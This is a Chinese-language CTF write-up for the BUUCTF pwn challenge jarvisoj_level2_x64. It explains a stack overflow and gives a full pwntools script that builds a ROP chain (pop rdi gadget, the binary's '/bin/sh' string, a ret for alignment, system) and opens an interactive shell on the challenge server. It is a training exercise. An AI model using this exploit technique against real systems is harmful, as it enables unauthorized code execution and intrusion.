【BUUCTF】jarvisoj_level2_x64 Write Up


【BUUCTF】jarvisoj_level2_x64 Write Up_第1张图片
漏洞函数里面可以看到,我们可以栈溢出

题目使用了system函数,我们可以直接调用
【BUUCTF】jarvisoj_level2_x64 Write Up_第2张图片
程序里面藏了一个binsh

接下来只需要构造rop链了

64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它

再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',26048)
#io=process('./level2_x64')
elf=ELF('./level2_x64')

ra()
sl('a'*0x88+p64(elf.search(asm('pop rdi\nret')).next())+p64(0x600a90)+p64(elf.search(asm('ret')).next())+p64(elf.plt['system']))

io.interactive()

你可能感兴趣的:(BUUCTF,-,PWN,CTF)